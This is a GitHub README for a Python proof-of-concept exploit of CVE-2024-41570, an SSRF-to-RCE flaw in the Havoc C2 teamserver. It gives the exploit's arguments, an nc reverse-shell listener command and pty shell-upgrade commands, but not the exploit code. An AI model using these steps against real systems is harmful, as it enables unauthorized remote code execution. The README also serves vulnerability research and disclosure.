Skip to content

Latest commit

 

History

History
88 lines (72 loc) · 2.68 KB

README.md

File metadata and controls

88 lines (72 loc) · 2.68 KB

CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

Features

  • Registers an agent to the target service.
  • Opens a WebSocket and sends handshake and authentication payloads.
  • Executes commands remotely via a reverse shell.
  • Provides a guided workflow with clear instructions.

Prerequisites

  • Python 3.x installed on your machine.
  • Install required dependencies by running: 
    pip install -r requirements.txt

Installation

  1. Clone this repository: 
    git clone https://github.com/<your-repo-name>.git
  2. Navigate to the project directory: 
    cd CVE-2024-41570
  3. Install dependencies: 
    pip install -r requirements.txt

Usage

Run the script with the required arguments:

python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Arguments

  • -t: Target URL of the WebSocket server.
  • -i: IP address of the Team Server form Havoc.
  • -p: Port for the Team Server from Havoc.
  • -U: Username for WebSocket authentication.
  • -P: Password for WebSocket authentication.
  • -l: Listener IP for the reverse shell (your machine).
  • -L: Listener port for the reverse shell (your machine).

Example Command

python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Steps to Execute

  1. Ensure the target service is running and vulnerable.
  2. Run the script with the required parameters.
  3. In a separate terminal, start a listener: 
    nc -lvnp <listener_port>
  4. Upgrade shell: 
    python -c 'import pty; pty.spawn("/bin/bash")' 
export TERM=xterm-256color
stty rows 67 columns 318

Dependencies

The script requires the following Python libraries:

  • requests
  • pycryptodome

Install them using the command:

pip install -r requirements.txt

Security Notice

This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

References

Inspired by Default Havoc Poc

Contributing

Contributions are welcome! Feel free to fork the repository and submit a pull request.

License

This project is licensed under the MIT License. See the LICENSE file for details.